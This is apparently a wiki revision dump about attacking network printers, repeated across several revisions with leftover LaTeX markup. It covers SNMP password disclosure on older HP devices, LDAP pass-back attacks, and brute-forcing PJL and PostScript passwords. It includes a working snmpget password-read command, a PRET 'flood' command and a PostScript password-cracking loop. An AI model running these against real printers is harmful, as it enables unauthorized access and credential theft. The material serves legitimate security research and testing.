attacker-controlled server. This example shows that passwords resident on printers may not only harm the device itself if integrated into a company's network. Printers and MFPs – which may offer insufficient protection – are therefore a good starting point in network penetration tests. '''How to test this attack?''' Check if you can change settings like the LDAP hostname in printer's embedded web server without authenticating. If supported Set the LDAP server in the To test this attack, the ''snmpset'' tool can be used as shown below: <syntaxhighlight lang=sh> $ snmpget -v1 -c public printer iso.3.6.1.4.1.11.2.3.9.1.1.13.0 iso.3.6.1.4.1.11.2.3.9.1.1.13.0 = Hex-STRING: 41 41 41 41 41 00 … </syntaxhighlight> Vulnerable devices will return the password in hex-decimal (here: ''AAAAA''), while newer devices do only respond with zerobytes. '''Who can perform this attack?''' Anyone who can access the printer's embedded web server. This may include [[https://en.wikipedia.org/wiki/Cross-site_request_forgery CRSF]] attacker, if the web application has no CSRF protection. <!-- % \textbf{SNMP} % \begin{lstlisting}[caption=Password Disclosure (older HP printers only\label{lst:snmp-passwd-disclosure}] % # snmpget -v 1 -c public printed .1.3.6.1.4.1.11.2.3.9.1.1.13.0 % \end{lstlisting} % % idee: systemativally try to GET/SET this and pjl-password (1.3.6.1.4.1.11.2.3.9.4.2.1.3.5.1.0) this via PML/SNMP % % Printer-MIB, HP-LASERJET-COMMON-MIB => read more mibs, e.g. webserver-passwd % maybe download mibs for *all* printers and look for passwd-disclosure % \textbf{EWS} % Web Inferface % in the early days, saved password often within html source code % also: GSOAP and other web services --> \subsection{Credential disclosure}\label{par:eval-credential-disclosure} % obtaining web server passwords through NVRAM dumping or file system access as % It is worth emphasizing that the cracking is speed nearly independed of the network latency because % not, only very few bytes have to be sent and the bottleneck is the printer's PJL interpreter % AND because we can simply send 65535 commands at once (and maybe check for a single DISABLED response). % even when no feedback machanism is provided given a worst-case model as there is no challenge-response mechanism in place (aka check if passwort is correct, else job is canceled by pjl interpreter). instead we can just reset the password using all possible values of the keyspace. no backchannel/feedback needed. % While Praeda does a good job in ... it does not attack the protection mechanisms in printer languages itself. == Brute-Force Attacks == Besides information leaked from sources like the embedded web server, printing languages offer limited passwords protection mechanisms themselves. Breaking such mechanisms has a priority in this wiki because it focuses on printer-specific weaknesses. Furthermore, whilst the routines to set the password for a printer's embedded web server differ from model to model they are standardized for both, PJL and PostScript. Although it is not very common for end-users or even administrators to set or actually know about these passwords, if enabled they can break some of the attacks discussed in this wiki. Attackers should therefore have a motivation to crack or bypass them if necessary. === PJL === PJL offers the possibility to set a password to lock access to the printer's hard disk and/or control panel. The standard however allows only numerical values ranging from 1 to 65,535 as key space <ref>''[http://h10032.www1.hp.com/ctg/Manual/bpl13208.pdf Printer Job Language Technical Reference Manual]'', HP Inc., 1997, ch. 6-21</ref>. Brute-force attacks as proposed by <ref>''Attacking Networked Embedded Devices'', Black Hat USA, FX and FtR of Phenoelit, 2002</ref> thus seem feasible. PostScript offers two types of passwords: one to change long-term system settings, the other to permanently alter the PostScript environment. The standard makes no explicit statement about key sizes, however both passwords are of type ''string'' which means up to 65,535 characters <ref>''[https://www.adobe.com/products/postscript/pdfs/PLRM.pdf PostScript Language Reference Manual, 3rd Edition]'', Adobe Systems Inc., 1999, p. 739</ref>. On the other hand, for simple passwords brute-force is very fast as passwords can be verified within a PostScript program running on the printer device itself. Performance can therefore be compared to offline cracking. An evaluation of brute-force attacks against PJL and PostScript passwords is given in \autoref{par:eval-credential-disclosure}. In the prototype implementation, the \texttt{lock} and \texttt{unlock} commands are used for setting and cracking passwords. In addition to web server passwords which can be obtained by memory or file system access as previously described, printer language credentials themselves are a valuable target as they are required for some of the attacks described in this work. For example, PJL disk lock as shown in \autoref{lst:pjl-passwd} is the defense mechanism propagated by HP against PJL file system access, including known path traversal vulnerabilities \cite{hp2010pjl}. PJL passwords however are vulnerable to brute-force attacks because of their limited 16 bit key size as demonstrated by \cite{phenoelit2002embedded} who were able to unlock the disk protection within six hours in the worst case. With PJL interpreters having gotten faster while the PJL standard was never updated and still limits passwords to numerical values ranging from 1 to 65535 \cite{hp1997pjl}, cracking time has efficiently decreased. The devices in our test printer pool, could verify between 50 and 1,000 passwords per second leading to average cracking times between 30 seconds and ten minutes as shown in \autoref{tab:cracking-results}. \begin{lstlisting}[caption=PJL control panel and disk lock\label{lst:pjl-passwd}] @PJL JOB PASSWORD=0 @PJL DEFAULT PASSWORD=12345 @PJL DEFAULT DISKLOCK=ON @PJL DEFAULT CPLOCK=ON \end{lstlisting} '''How to test this attack?''' ./pret.py -q printer pjl Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> flood '''Who can perform this attack?''' Any anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. Feedback from the printer is not required because attackers can blindly remove the password protection by including all 65535 possible combinations in a single print job. Note that while PJL passwords could be set on various devices, actual disk lock and/or control panel lock was only supported by the \textit{HP LaserJet 4200N}, the \textit{HP LaserJet 4250N}, the \textit{Brother MFC-9120CN} and the \textit{Konica bizhub 20p}. We are not aware if the password has any undocumented, proprietary effects on the other machines or is just a dummy variable. Non-compliant with the PJL standard, the \textit{Brother MFC-9120CN}, the \textit{Brother DCP-9045CDN} and the \textit{Konica bizhub 20p} do not verify the password to lock or unlock the control panel, rendering it practically useless. === PostScript === PostScript has similar protection mechanisms: The ''SystemParamsPassword'' is used to change print job settings like paper size while the ''StartJobPassword'' is required to exit the server loop and therefore permanently alter the PostScript environment. The ''checkpassword'' operator which takes either an integer or a string as input checks for both passwords at once <ref>''[http://ftp.ktug.org/obsolete/info/adobe/devtechnotes/pdffiles/ps2016.supplement.pdf PostScript Language Reference Manual Supplement for Version 2016]'', Adobe Systems Inc., 1995, p. 194</ref>. The key size is very large: PostScript strings can contain arbitrary ASCII characters and have a maximal length of 65,565 <ref>''[https://www.adobe.com/products/postscript/pdfs/PLRM.pdf PostScript Language Reference Manual, 3rd Edition]'', Adobe Systems Inc., 1999, p. 739</ref> which theoretically allows 524,280 bit passwords. On the positive side (from an attackes point of view) brute-force attacks against PostScript passwords can be performed extremely fast because the PostScript interpreter can be programmed to literally crack itself. A simple PostScript password cracker testing for numerical values as passwords is given below: <syntaxhighlight lang=postscript> /min 0 def /max 1000000 def statusdict begin { min 1 max {dup checkpassword {== flush stop} {pop} ifelse} for } stopped pop \end{lstlisting} </syntaxhighlight> Results are given in \autoref{tab:cracking-results}. Tested printers were capable of performing between 5,000 and 100,000 password verifications per second. Such enormous cracking rates can be achieved because a printer's RIP is highly optimized for fast processing of PostScript code. The \textit{Brother MFC-9120CN}, the \textit{Brother DCP-9045CDN} and the \textit{Konica bizhub 20p} are exceptions. They only accept one password per second but also check for the very first character of the password only which effectively limits the key size to 256 characters or 8 bit. The \textit{Samsung CLX-3305W} and the \textit{Samsung MultiPress 6345N} do not allow PostScript feedback and their printing functionality is mechanically broken, so we used a side-channel based on timing to estimate cracking speed. The \textit{Kyocera FS-C5200DN} does not support permanent PostScript passwords. % on Konica, we can simply DINQUIRE the PASSWORD: % :/> lock 1 % PIN protection: 6500 % also not tehat for the dells, the dingquire command showed the password % newer devices use 2,14mio possibilities (deskjet?) \begin{table}[H] % n/a*: Brother devices extrawurst | n/a**: dell devices echo the password \begin{tabularx}{\textwidth}{|X|r|r|r|r|} \hline Printer model & \multicolumn{2}{c|}{PJL passwords} & \multicolumn{2}{c|}{PostScript passwords}\\ \cline{2-5} & key size & tests/sec & key size & tests/sec\\ \hline \hline % $2^{19}$ HP LaserJet 1200 & 16 bit & 200 & 524,280 bit & 5,000 \\ % 192.168.50.48 | PS: 170 HP LaserJet 4200N & 16 bit & 200 & 524,280 bit & 91,000 \\ % 192.168.50.30 ON ON | PS: 11 HP LaserJet 4250N & 16 bit & 130 & 524,280 bit & 100,000 \\ % 192.168.50.110 ON ON | PS: 10 HP LaserJet P2015dn & 16 bit & 1,000 & 524,280 bit & 83,000 \\ % 192.168.50.45 | PS: 12 HP LaserJet M2727nfs & 16 bit & 100 & 524,280 bit & 100,000 \\ % 192.168.50.38 | PS: 10 HP LaserJet 3392 AiO & 16 bit & 1,000 & 524,280 bit & 53,000 \\ % 192.168.50.36 | PS: 19 HP Color LJ CP1515n & 16 bit & 1,000 & 524,280 bit & 100,000 \\ % 192.168.50.42 | PS: 10 Brother MFC-9120CN & 16 bit & n/a & 8 bit & 1 \\ % 192.168.50.37 ON UN | PS: BROTHER | n/a* Brother DCP-9045CDN & 16 bit & n/a & 8 bit & 1 \\ % 192.168.50.34 | PS: BROTHER | n/a* Lexmark X264dn & n/a & n/a & 524,280 bit & 5,000 \\ % 192.168.50.39 | PS: 170 Lexmark E360dn & n/a & n/a & 524,280 bit & 8,000 \\ % 192.168.50.43 | PS: 120 Lexmark C736dn & n/a & n/a & 524,280 bit & 53,000 \\ % 192.168.50.202 | PS: 19 Dell 5130cdn & n/a & n/a & 524,280 bit & 62,000 \\ % 192.168.50.24 | PS: 16 | n/a** Dell 1720n & n/a & n/a & 524,280 bit & 12,000 \\ % 192.168.50.44 | PS: 80 Dell 3110cn & n/a & n/a & 524,280 bit & 50,000 \\ % 192.168.50.33 | PS: HMMM | n/a** Kyocera FS-C5200DN & 16 bit & 50 & n/a & n/a \\ % 192.168.50.35 OFF OFF | PS: -- Samsung CLX-3305W & n/a & n/a & 524,280 bit & 62,000 \\ % 192.168.50.87 | PS: HMMM Samsung MultiPress 6345N & n/a & n/a & n/a & n/a \\ % 192.168.50.92 | PS: HMMM Konica bizhub 20p & 16 bit & n/a & 8 bit & 1 \\ % 192.168.50.123 ON UN | PS: BROTHER | n/a* OKI MC342dn & n/a & n/a & 524,280 bit & 38,000 \\ % 192.168.50.127 % \hline % Konica bizhub C454e & 16 bit & 50 & 524,280 bit & ? \\ \hline \end{tabularx} \caption{Exhaustive key search in PJL and PostScript} \label{tab:cracking-results} \end{table} --> 8e8eff910c3926448e08bbbd3a3daa52ec9fa2a8 163 140 2017-01-18T17:57:11Z 134.147.128.156 0 wikitext text/x-wiki <!-- == Password Disclosure == Ancient (before 2003) HP printers ards JetDirect 300X, (J3263A), JetDirect EX Plus (J2591A), JetDirect 400N (J2552A, J2552B), JetDirect 600N (J3110A, J3111A, J3113A) and older. -The Jetdirect card is being managed from HP Web Jetadmin. -A Web Jetadmin "device password" had been set on the JetDirect card. (This password must be set from Web Jetadmin and has nothing to do with the Telnet password or the SNMP Set community name) In the above situation the Web Jetadmin device password is readable as plain ASCII tekst from the JetDirect card using SNMP. How to check your printers for this vulnerability: Use an SNMP toolkit to read the following OID from your printer: .iso.org.dod.internet.private.enterprises.hp.nm.system.net-peripheral.ne t- printer.generalDeviceStatus.gdPasswords (In numerical format: .1.3.6.1.4.1.11.2.3.9.1.1.13.0) An example on a Windows machine, using SNMPUTIL from the Windows Resource kit: C:\>snmputil get 131.155.120.118 public .1.3.6.1.4.1.11.2.3.9.1.1.13.0 Variable = .iso.org.dod.internet.private.enterprises.11.2.3.9.1.1.13.0 Value = String <0x41><0x42><0x43><0x44><0x55><0x56><0x3d><0x31><0x30><0x38><0 x3b><0x00><0x00><0x00><0x00> ..etc... The resulting string reads in ASCII: ABCDEF=108; The Web Jetadmin device password is the word before the '=' sign, in this case: ABCDEF How to protect your printer: 1. Keep the Web Jetadmin device password EMPTY (don't do this on newer cards than the ones mentioned above) 2. Define a 'Set community name' instead Additional means of protection (does not address t % \textbf{SNMP} % \begin{lstlisting}[caption=Password Disclosure (older HP printers only\label{lst:snmp-passwd-disclosure}] % # snmpget -v 1 -c public printed .1.3.6.1.4.1.11.2.3.9.1.1.13.0 % \end{lstlisting} % % idee: systemativally try to GET/SET this and pjl-password (1.3.6.1.4.1.11.2.3.9.4.2.1.3.5.1.0) this via PML/SNMP % % Printer-MIB, HP-LASERJET-COMMON-MIB => read more mibs, e.g. webserver-passwd % maybe download mibs for *all* printers and look for passwd-disclosure % \textbf{EWS} % Web Inferface % in the early days, saved password often within html source code % also: GSOAP and other web services Lexmark SOAP \subsection{Credential disclosure}\label{par:eval-credential-disclosure} % obtaining web server passwords through NVRAM dumping or file system access as % It is worth emphasizing that the cracking is speed nearly independed of the network latency because % not, only very few bytes have to be sent and the bottleneck is the printer's PJL interpreter % AND because we can simply send 65535 commands at once (and maybe check for a single DISABLED response). % even when no feedback machanism is provided given a worst-case model as there is no challenge-response mechanism in place (aka check if passwort is correct, else job is canceled by pjl interpreter). instead we can just reset the password using all possible values of the keyspace. no backchannel/feedback needed. Printers are commonly deployed with a default password or no initial password at all. In both cases, end-user or administrators have to actively set a password to secure the device. One approach to systematically collect credentials and other information from the web server is the \textit{Praeda}\footnote{Heiland, D., \textit{Praeda -- Automated Printer Data Harvesting Tool},\\ \url{http://h.foofus.net/?page_id=218}, Aug. 2016} tool. Besides exploiting vulnerabilities that lead to disclosure of device passwords, the program gathers usernames and email addresses, which are often publicly available via the printer's web interface and can be used for further network penetration tests. One remarkable class of attacks to be mentioned in this context is pass-back attacks were `an MFP device is directed into authenticating [...] against a rogue system rather than the expected server' \cite{heiland2011passback}. This works in setups where an MFP verifies users by requesting and external \acs{LDAP} server. Note that the password to access the LDAP server is stored on the MFP itself. If the MFP allows an attacker to change the address of the LDAP server while keeping the old password, whenever someone \mbox{(e.g., the attacker itself)} tries to authenticate with the MFP, the MFP leaks the original LDAP password to the attacker-controlled server. This example shows that passwords resident on printers may not only harm the device itself if integrated into a company's network. Printers and MFPs -- which may offer insufficient protection -- are therefore a good starting point in network penetration tests.\\ % While Praeda does a good job in ... it does not attack the protection mechanisms in printer languages itself. == Brute-Force Attacks == Besides information leaked from sources like the embedded web server, printing languages offer limited passwords protection mechanisms themselves. Breaking such mechanisms has a priority in this wiki because it focuses on printer-specific weaknesses. Furthermore, whilst the routines to set the password for a printer's embedded web server differ from model to model they are standardized for both, PJL and PostScript. Although it is not very common for end-users or even administrators to set or actually know about these passwords, if enabled they can break some of the attacks discussed in this wiki. Attackers should therefore have a motivation to crack or bypass them if necessary. PJL offers the possibility to set a password to lock access to the printer's hard disk and/or control panel. The standard however allows only numerical values ranging from 1 to 65,535 as key space <ref>''[http://h10032.www1.hp.com/ctg/Manual/bpl13208.pdf Printer Job Language Technical Reference Manual]'', HP Inc., 1997, ch. 6-21</ref>. Brute-force attacks as proposed by <ref>''Attacking Networked Embedded Devices'', Black Hat USA, FX and FtR of Phenoelit, 2002</ref> thus seem feasible. PostScript offers two types of passwords: one to change long-term system settings, the other to permanently alter the PostScript environment. The standard makes no explicit statement about key sizes, however both passwords are of type ''string'' which means up to 65,535 characters <ref>''[https://www.adobe.com/products/postscript/pdfs/PLRM.pdf PostScript Language Reference Manual, 3rd Edition]'', Adobe Systems Inc., 1999, p. 739</ref>. On the other hand, for simple passwords brute-force is very fast as passwords can be verified within a PostScript program running on the printer device itself. Performance can therefore be compared to offline cracking. An evaluation of brute-force attacks against PJL and PostScript passwords is given in \autoref{par:eval-credential-disclosure}. In the prototype implementation, the \texttt{lock} and \texttt{unlock} commands are used for setting and cracking passwords. In addition to web server passwords which can be obtained by memory or file system access as previously described, printer language credentials themselves are a valuable target as they are required for some of the attacks described in this work. For example, PJL disk lock as shown in \autoref{lst:pjl-passwd} is the defense mechanism propagated by HP against PJL file system access, including known path traversal vulnerabilities \cite{hp2010pjl}. PJL passwords however are vulnerable to brute-force attacks because of their limited 16 bit key size as demonstrated by \cite{phenoelit2002embedded} who were able to unlock the disk protection within six hours in the worst case. With PJL interpreters having gotten faster while the PJL standard was never updated and still limits passwords to numerical values ranging from 1 to 65535 \cite{hp1997pjl}, cracking time has efficiently decreased. The devices in our test printer pool, could verify between 50 and 1,000 passwords per second leading to average cracking times between 30 seconds and ten minutes as shown in \autoref{tab:cracking-results}. \begin{lstlisting}[caption=PJL control panel and disk lock\label{lst:pjl-passwd}] @PJL JOB PASSWORD=0 @PJL DEFAULT PASSWORD=12345 @PJL DEFAULT DISKLOCK=ON @PJL DEFAULT CPLOCK=ON \end{lstlisting} '''How to test this attack?''' ./pret.py -q printer pjl Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> flood '''Who can perform this attack?''' Any anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. Feedback from the printer is not required because attackers can blindly remove the password protection by including all 65535 possible combinations in a single print job. Note that while PJL passwords could be set on various devices, actual disk lock and/or control panel lock was only supported by the \textit{HP LaserJet 4200N}, the \textit{HP LaserJet 4250N}, the \textit{Brother MFC-9120CN} and the \textit{Konica bizhub 20p}. We are not aware if the password has any undocumented, proprietary effects on the other machines or is just a dummy variable. Non-compliant with the PJL standard, the \textit{Brother MFC-9120CN}, the \textit{Brother DCP-9045CDN} and the \textit{Konica bizhub 20p} do not verify the password to lock or unlock the control panel, rendering it practically useless. PostScript has similar protection mechanisms: The \textit{SystemParamsPassword} is used to change print job settings like paper size while the \textit{StartJobPassword} is required to exit the server loop and therefore permanently alter the PostScript environment. The \texttt{checkpassword} operator which takes either an integer or a string as input checks for both passwords at once \cite{adobe1995supplement}. The key size is very large: PostScript strings can contain arbitrary \acs{ASCII} characters and have a maximal length of 65565 \cite{postscript1999language} which theoretically allows 524,280 bit passwords. On the positive side, \mbox{brute-force} attacks against PostScript passwords can be performed extremely fast because the PostScript interpreter can be programmed to literally crack itself. A simple PostScript password cracker testing for numerical values as passwords is given below: /min 0 def /max 1000000 def statusdict begin { min 1 max {dup checkpassword {== flush stop} {pop} ifelse} for } stopped pop \end{lstlisting} Results are given in \autoref{tab:cracking-results}. Tested printers were capable of performing between 5,000 and 100,000 password verifications per second. Such enormous cracking rates can be achieved because a printer's \acs{RIP} is highly optimized for fast processing of PostScript code. The \textit{Brother MFC-9120CN}, the \textit{Brother DCP-9045CDN} and the \textit{Konica bizhub 20p} are exceptions. They only accept one password per second but also check for the very first character of the password only which effectively limits the key size to 256 characters or 8 bit. The \textit{Samsung CLX-3305W} and the \textit{Samsung MultiPress 6345N} do not allow PostScript feedback and their printing functionality is mechanically broken, so we used a side-channel based on timing to estimate cracking speed. The \textit{Kyocera FS-C5200DN} does not support permanent PostScript passwords. % on Konica, we can simply DINQUIRE the PASSWORD: % 110.143.198.48:/> lock 1 % PIN protection: 6500 % also not tehat for the dells, the dingquire command showed the password % newer devices use 2,14mio possibilities (deskjet?) \begin{table}[H] % n/a*: Brother devices extrawurst | n/a**: dell devices echo the password \begin{tabularx}{\textwidth}{|X|r|r|r|r|} \hline Printer model & \multicolumn{2}{c|}{PJL passwords} & \multicolumn{2}{c|}{PostScript passwords}\\ \cline{2-5} & key size & tests/sec & key size & tests/sec\\ \hline \hline % $2^{19}$ HP LaserJet 1200 & 16 bit & 200 & 524,280 bit & 5,000 \\ % 192.168.50.48 | PS: 170 HP LaserJet 4200N & 16 bit & 200 & 524,280 bit & 91,000 \\ % 192.168.50.30 ON ON | PS: 11 HP LaserJet 4250N & 16 bit & 130 & 524,280 bit & 100,000 \\ % 192.168.50.110 ON ON | PS: 10 HP LaserJet P2015dn & 16 bit & 1,000 & 524,280 bit & 83,000 \\ % 192.168.50.45 | PS: 12 HP LaserJet M2727nfs & 16 bit & 100 & 524,280 bit & 100,000 \\ % 192.168.50.38 | PS: 10 HP LaserJet 3392 AiO & 16 bit & 1,000 & 524,280 bit & 53,000 \\ % 192.168.50.36 | PS: 19 HP Color LJ CP1515n & 16 bit & 1,000 & 524,280 bit & 100,000 \\ % 192.168.50.42 | PS: 10 Brother MFC-9120CN & 16 bit & n/a & 8 bit & 1 \\ % 192.168.50.37 ON UN | PS: BROTHER | n/a* Brother DCP-9045CDN & 16 bit & n/a & 8 bit & 1 \\ % 192.168.50.34 | PS: BROTHER | n/a* Lexmark X264dn & n/a & n/a & 524,280 bit & 5,000 \\ % 192.168.50.39 | PS: 170 Lexmark E360dn & n/a & n/a & 524,280 bit & 8,000 \\ % 192.168.50.43 | PS: 120 Lexmark C736dn & n/a & n/a & 524,280 bit & 53,000 \\ % 192.168.50.202 | PS: 19 Dell 5130cdn & n/a & n/a & 524,280 bit & 62,000 \\ % 192.168.50.24 | PS: 16 | n/a** Dell 1720n & n/a & n/a & 524,280 bit & 12,000 \\ % 192.168.50.44 | PS: 80 Dell 3110cn & n/a & n/a & 524,280 bit & 50,000 \\ % 192.168.50.33 | PS: HMMM | n/a** Kyocera FS-C5200DN & 16 bit & 50 & n/a & n/a \\ % 192.168.50.35 OFF OFF | PS: -- Samsung CLX-3305W & n/a & n/a & 524,280 bit & 62,000 \\ % 192.168.50.87 | PS: HMMM Samsung MultiPress 6345N & n/a & n/a & n/a & n/a \\ % 192.168.50.92 | PS: HMMM Konica bizhub 20p & 16 bit & n/a & 8 bit & 1 \\ % 192.168.50.123 ON UN | PS: BROTHER | n/a* OKI MC342dn & n/a & n/a & 524,280 bit & 38,000 \\ % 192.168.50.127 % \hline % Konica bizhub C454e & 16 bit & 50 & 524,280 bit & ? \\ \hline \end{tabularx} \caption{Exhaustive key search in PJL and PostScript} \label{tab:cracking-results} \end{table} --> 47823f8f39abc34ad938f6113e3813dab0cac0c9 140 2017-01-14T20:15:01Z Admin 1 Created page with "<!-- == Password Disclosure == % \textbf{SNMP} % \begin{lstlisting}[caption=Password Disclosure (older HP printers only\label{lst:snmp-passwd-disclosure}] % # snmpget -v 1..." wikitext text/x-wiki <!-- == Password Disclosure == % \textbf{SNMP} % \begin{lstlisting}[caption=Password Disclosure (older HP printers only\label{lst:snmp-passwd-disclosure}] % # snmpget -v 1 -c public printed .1.3.6.1.4.1.11.2.3.9.1.1.13.0 % \end{lstlisting} % % idee: systemativally try to GET/SET this and pjl-password (1.3.6.1.4.1.11.2.3.9.4.2.1.3.5.1.0) this via PML/SNMP % % Printer-MIB, HP-LASERJET-COMMON-MIB => read more mibs, e.g. webserver-passwd % maybe download mibs for *all* printers and look for passwd-disclosure % \textbf{EWS} % Web Inferface % in the early days, saved password often within html source code % also: GSOAP and other web services Lexmark SOAP \subsection{Credential disclosure}\label{par:eval-credential-disclosure} % obtaining web server passwords through NVRAM dumping or file system access as % It is worth emphasizing that the cracking is speed nearly independed of the network latency because % not, only very few bytes have to be sent and the bottleneck is the printer's PJL interpreter % AND because we can simply send 65535 commands at once (and maybe check for a single DISABLED response). % even when no feedback machanism is provided given a worst-case model as there is no challenge-response mechanism in place (aka check if passwort is correct, else job is canceled by pjl interpreter). instead we can just reset the password using all possible values of the keyspace. no backchannel/feedback needed. Printers are commonly deployed with a default password or no initial password at all. In both cases, end-user or administrators have to actively set a password to secure the device. One approach to systematically collect credentials and other information from the web server is the \textit{Praeda}\footnote{Heiland, D., \textit{Praeda -- Automated Printer Data Harvesting Tool},\\ \url{http://h.foofus.net/?page_id=218}, Aug. 2016} tool. Besides exploiting vulnerabilities that lead to disclosure of device passwords, the program gathers usernames and email addresses, which are often publicly available via the printer's web interface and can be used for further network penetration tests. One remarkable class of attacks to be mentioned in this context is pass-back attacks were `an MFP device is directed into authenticating [...] against a rogue system rather than the expected server' \cite{heiland2011passback}. This works in setups where an MFP verifies users by requesting and external \acs{LDAP} server. Note that the password to access the LDAP server is stored on the MFP itself. If the MFP allows an attacker to change the address of the LDAP server while keeping the old password, whenever someone \mbox{(e.g., the attacker itself)} tries to authenticate with the MFP, the MFP leaks the original LDAP password to the attacker-controlled server. This example shows that passwords resident on printers may not only harm the device itself if integrated into a company's network. Printers and MFPs -- which may offer insufficient protection -- are therefore a good starting point in network penetration tests.\\ % While Praeda does a good job in ... it does not attack the protection mechanisms in printer languages itself. == Brute-Force Attacks == Besides information leaked from sources like the embedded web server, printing languages offer limited passwords protection mechanisms themselves. Breaking such mechanisms has a priority in this wiki because it focuses on printer-specific weaknesses. Furthermore, whilst the routines to set the password for a printer's embedded web server differ from model to model they are standardized for both, PJL and PostScript. Although it is not very common for end-users or even administrators to set or actually know about these passwords, if enabled they can break some of the attacks discussed in this wiki. Attackers should therefore have a motivation to crack or bypass them if necessary. PJL offers the possibility to set a password to lock access to the printer's hard disk and/or control panel. The standard however allows only numerical values ranging from 1 to 65,535 as key space <ref>''[http://h10032.www1.hp.com/ctg/Manual/bpl13208.pdf Printer Job Language Technical Reference Manual]'', HP Inc., 1997, ch. 6-21</ref>. Brute-force attacks as proposed by <ref>''Attacking Networked Embedded Devices'', Black Hat USA, FX and FtR of Phenoelit, 2002</ref> thus seem feasible. PostScript offers two types of passwords: one to change long-term system settings, the other to permanently alter the PostScript environment. The standard makes no explicit statement about key sizes, however both passwords are of type ''string'' which means up to 65,535 characters <ref>''[https://www.adobe.com/products/postscript/pdfs/PLRM.pdf PostScript Language Reference Manual, 3rd Edition]'', Adobe Systems Inc., 1999, p. 739</ref>. On the other hand, for simple passwords brute-force is very fast as passwords can be verified within a PostScript program running on the printer device itself. Performance can therefore be compared to offline cracking. An evaluation of brute-force attacks against PJL and PostScript passwords is given in \autoref{par:eval-credential-disclosure}. In the prototype implementation, the \texttt{lock} and \texttt{unlock} commands are used for setting and cracking passwords. In addition to web server passwords which can be obtained by memory or file system access as previously described, printer language credentials themselves are a valuable target as they are required for some of the attacks described in this work. For example, PJL disk lock as shown in \autoref{lst:pjl-passwd} is the defense mechanism propagated by HP against PJL file system access, including known path traversal vulnerabilities \cite{hp2010pjl}. PJL passwords however are vulnerable to brute-force attacks because of their limited 16 bit key size as demonstrated by \cite{phenoelit2002embedded} who were able to unlock the disk protection within six hours in the worst case. With PJL interpreters having gotten faster while the PJL standard was never updated and still limits passwords to numerical values ranging from 1 to 65535 \cite{hp1997pjl}, cracking time has efficiently decreased. The devices in our test printer pool, could verify between 50 and 1,000 passwords per second leading to average cracking times between 30 seconds and ten minutes as shown in \autoref{tab:cracking-results}. \begin{lstlisting}[caption=PJL control panel and disk lock\label{lst:pjl-passwd}] @PJL JOB PASSWORD=0 @PJL DEFAULT PASSWORD=12345 @PJL DEFAULT DISKLOCK=ON @PJL DEFAULT CPLOCK=ON \end{lstlisting} '''How to test this attack?''' ./pret.py -q printer pjl Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> flood '''Who can perform this attack?''' Any anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. Feedback from the printer is not required because attackers can blindly remove the password protection by including all 65535 possible combinations in a single print job. Note that while PJL passwords could be set on various devices, actual disk lock and/or control panel lock was only supported by the \textit{HP LaserJet 4200N}, the \textit{HP LaserJet 4250N}, the \textit{Brother MFC-9120CN} and the \textit{Konica bizhub 20p}. We are not aware if the password has any undocumented, proprietary effects on the other machines or is just a dummy variable. Non-compliant with the PJL standard, the \textit{Brother MFC-9120CN}, the \textit{Brother DCP-9045CDN} and the \textit{Konica bizhub 20p} do not verify the password to lock or unlock the control panel, rendering it practically useless. PostScript has similar protection mechanisms: The \textit{SystemParamsPassword} is used to change print job settings like paper size while the \textit{StartJobPassword} is required to exit the server loop and therefore permanently alter the PostScript environment. The \texttt{checkpassword} operator which takes either an integer or a string as input checks for both passwords at once \cite{adobe1995supplement}. The key size is very large: PostScript strings can contain arbitrary \acs{ASCII} characters and have a maximal length of 65565 \cite{postscript1999language} which theoretically allows 524,280 bit passwords. On the positive side, \mbox{brute-force} attacks against PostScript passwords can be performed extremely fast because the PostScript interpreter can be programmed to literally crack itself. A simple PostScript password cracker testing for numerical values as passwords is given below: /min 0 def /max 1000000 def statusdict begin { min 1 max {dup checkpassword {== flush stop} {pop} ifelse} for } stopped pop \end{lstlisting} Results are given in \autoref{tab:cracking-results}. Tested printers were capable of performing between 5,000 and 100,000 password verifications per second. Such enormous cracking rates can be achieved because a printer's \acs{RIP} is highly optimized for fast processing of PostScript code. The \textit{Brother MFC-9120CN}, the \textit{Brother DCP-9045CDN} and the \textit{Konica bizhub 20p} are exceptions. They only accept one password per second but also check for the very first character of the password only which effectively limits the key size to 256 characters or 8 bit. The \textit{Samsung CLX-3305W} and the \textit{Samsung MultiPress 6345N} do not allow PostScript feedback and their printing functionality is mechanically broken, so we used a side-channel based on timing to estimate cracking speed. The \textit{Kyocera FS-C5200DN} does not support permanent PostScript passwords. % on Konica, we can simply DINQUIRE the PASSWORD: % 110.143.198.48:/> lock 1 % PIN protection: 6500 % also not tehat for the dells, the dingquire command showed the password % newer devices use 2,14mio possibilities (deskjet?) \begin{table}[H] % n/a*: Brother devices extrawurst | n/a**: dell devices echo the password \begin{tabularx}{\textwidth}{|X|r|r|r|r|} \hline Printer model & \multicolumn{2}{c|}{PJL passwords} & \multicolumn{2}{c|}{PostScript passwords}\\ \cline{2-5} & key size & tests/sec & key size & tests/sec\\ \hline \hline % $2^{19}$ HP LaserJet 1200 & 16 bit & 200 & 524,280 bit & 5,000 \\ % 192.168.50.48 | PS: 170 HP LaserJet 4200N & 16 bit & 200 & 524,280 bit & 91,000 \\ % 192.168.50.30 ON ON | PS: 11 HP LaserJet 4250N & 16 bit & 130 & 524,280 bit & 100,000 \\ % 192.168.50.110 ON ON | PS: 10 HP LaserJet P2015dn & 16 bit & 1,000 & 524,280 bit & 83,000 \\ % 192.168.50.45 | PS: 12 HP LaserJet M2727nfs & 16 bit & 100 & 524,280 bit & 100,000 \\ % 192.168.50.38 | PS: 10 HP LaserJet 3392 AiO & 16 bit & 1,000 & 524,280 bit & 53,000 \\ % 192.168.50.36 | PS: 19 HP Color LJ CP1515n & 16 bit & 1,000 & 524,280 bit & 100,000 \\ % 192.168.50.42 | PS: 10 Brother MFC-9120CN & 16 bit & n/a & 8 bit & 1 \\ % 192.168.50.37 ON UN | PS: BROTHER | n/a* Brother DCP-9045CDN & 16 bit & n/a & 8 bit & 1 \\ % 192.168.50.34 | PS: BROTHER | n/a* Lexmark X264dn & n/a & n/a & 524,280 bit & 5,000 \\ % 192.168.50.39 | PS: 170 Lexmark E360dn & n/a & n/a & 524,280 bit & 8,000 \\ % 192.168.50.43 | PS: 120 Lexmark C736dn & n/a & n/a & 524,280 bit & 53,000 \\ % 